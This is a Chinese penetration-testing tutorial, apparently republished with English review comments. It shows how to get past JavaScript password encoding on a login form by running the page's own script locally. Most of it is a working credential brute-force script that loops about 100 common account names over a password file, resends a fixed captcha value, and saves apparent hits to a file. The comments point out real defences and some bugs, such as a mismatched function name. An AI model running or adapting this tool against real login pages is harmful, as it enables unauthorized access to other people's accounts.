绕过前端加密进行爆破(附脚本)

在渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密是js脚本自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为admin123,加密的效果如下:

这里写图片描述

可以看到加密的函数主要是encode,所以每个密码在提交前都会先经过这个自定义函数加密。由于 encode 及其所需的参数都随页面下发到浏览器,这种前端加密只是改变了提交的格式,并不能阻止对口令的猜测;真正起作用的是服务端的验证码校验、限速和账号锁定。

这里写图片描述

最近在实战过程中get到一个new trick:利用相应的工具或者模块在本地执行该 js 文件,拿到输出结果即可。可以使用 Python 的第三方模块 execjs(并非 Python 自带,需要按下文用 pip 安装 PyExecJS),本机还需要有可用的 JS 运行时(下面的脚本用的是 PhantomJS)。

安装

先安装 execjs
pip install PyExecJS

将js代码保存在本地。

#coding:utf-8
from selenium import webdriver
import  execjs

# Load the JavaScript saved from the login page and run its password routine locally.
# NOTE(review): test.js is script taken from a remote site and is executed here by a
# local JS runtime, outside any browser sandbox - read it before running it.
with open ('test.js','r') as jj:
    source = jj.read()
    # Ask PyExecJS for the PhantomJS runtime by name.
    phantom = execjs.get('PhantomJS')
    # Compile the page script so its functions can be called from Python.
    getpass = phantom.compile(source)
    # NOTE(review): this calls 'encrypt', while the article text and the later
    # script call 'encode' - confirm which name test.js actually defines.
    mypass = getpass.call('encrypt', 'admin','admin123')
    # Python 2 print statement; presumably this is the value the page would submit.
    print mypass

利用以上代码可获得加密后的密码(即前端实际提交的值)。

爆破

自动化走起,写了一个python脚本进行渗透爆破。

#coding=utf-8
# Python 2 only: reload(sys) brings back sys.setdefaultencoding (removed from the
# module at interpreter start-up) so the process-wide default codec can be set to
# UTF-8. This changes implicit str/unicode conversions everywhere in the process.
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
# Of the imports below, only requests, threading and execjs are referenced by the
# code shown in this listing; re, base64, time, random and webdriver are not.
import requests
import re
import base64
import time
import random
import threading
from selenium import webdriver
import  execjs

def brute(user,password,UA):
        """Submit one login attempt for (user, password) and record apparent hits.

        Args:
            user: account name placed in the userName form field.
            password: candidate plaintext; it is passed through the page's own
                'encode' routine from test.js before being sent.
            UA: accepted but never used - the headers dict below sets no
                User-Agent.

        Returns:
            None. Output goes to stdout and, on an apparent hit, to
            accounts-cracked.txt.
        """
        # Placeholder host from the article; note the scheme is plain http.
        url = 'http://xxx/login'
        # test.js is re-read and re-compiled on every call.
        # NOTE(review): this executes script saved from the remote site in a local
        # JS runtime, outside any browser sandbox.
        with open('test.js', 'r') as jj:
            source = jj.read()
            # phantom = execjs.get('PhantomJS')
            # No runtime name given: PyExecJS selects a JS runtime itself.
            phantom = execjs.get()
            getpass = phantom.compile(source)
            print user, password
            # Reproduce the value the page would put in the userPass field.
            mypass = getpass.call('encode', user, password)
            passwd = mypass
            print passwd
        post_data = {}
        post_data['userName'] = user
        post_data['userPass'] = passwd
        # The same captcha text is sent on every request.
        # NOTE(review): that only gets past a server which does not validate the
        # captcha per attempt - cannot confirm from this listing. Single-use,
        # session-bound captcha checks plus per-account and per-source throttling
        # are what stop this traffic; the client-side encoding does not.
        post_data['verifyCode'] = 'dsvx'
        headers ={
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "Referer": "http://xxx/",
        "Connection": "close"}
        # No timeout argument is passed and no exception is handled here.
        resp = requests.post(url=url,data=post_data,headers=headers)
        # The full response body is printed for every attempt.
        print user+"#"+password+" "+resp.content
        # find() returns -1 when the failure text is absent, so the condition is true
        # for ANY body without that text (captcha error, block page, HTTP error) and
        # also when the text sits at index 0 - the "hit" below is not proof of a
        # valid login.
        # NOTE(review): resp.content is a byte str compared with a unicode literal;
        # presumably this relies on the UTF-8 default encoding set at module level.
        if not resp.content.find(u'请检查账号和密码') > 0 :
            print '*** find user:', user, 'with password:', password, '***'
            # Appends the user and the encoded value (passwd, not the plaintext
            # password) to a local file; the plaintext was already printed above.
            with open('accounts-cracked.txt', 'a+') as f:
                f.write(user + '    ' +  passwd + '\n')



def main():
    """Call brute() for every password in pass2.txt against a fixed list of account names."""
    tsk = []
    # Hard-coded candidate account names (generic role and service names).
    user_list = ['admin','noreply','hr','jobs','qiniu','lietou','demo','ceo','dev','root','service','fuwu','yunying','webmaster','wechat','weixin','weibo','tec','bd','bf','op','shop','test','pm','kefu','cdn','marketing','zhaopin','suggestion','warning','risk','system','pay','payment','management','feedback','guanli','ci','ad','td','news','cert','sdk','pmd','appstore','development','it','fankui','notify','bugs','security','sec','alipay','yunwei','message','support','ceshi','developer','notice','redmine','alert','kaifa','seo','git','vpn','jenkins','jira','zabbix','chandao','nagios','monitor','account','jubao','backup','open','openapi','github','reload','blacklist','buyer','caiwu','order','postmaster','pr','report','public','download','som','ops','devops','caigou','pmp','monit']
    # The file handle is never closed; readlines() loads the whole list into memory.
    f1 = open('pass2.txt','r')
    # Outer loop is the password, inner loop the account: each password is tried
    # against every name before the next password is used.
    for i in f1.readlines():
        password = i.strip()
        for j in user_list:
            user = j
            # Passed to brute(), which does not use it.
            UA = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0"
            # One Thread object per (password, user) pair, all created before any runs.
            t = threading.Thread(target = brute,args = (user,password,UA))
            tsk.append(t)
    for t in tsk:
        t.start()
        t.join()# block until this thread finishes (original note: 0.1); attempts therefore go out one at a time


# Run main() only when the file is executed as a script, not when it is imported.
if __name__ == '__main__':
    main()

效果图:

这里写图片描述

参考:
https://segmentfault.com/a/1190000010179232


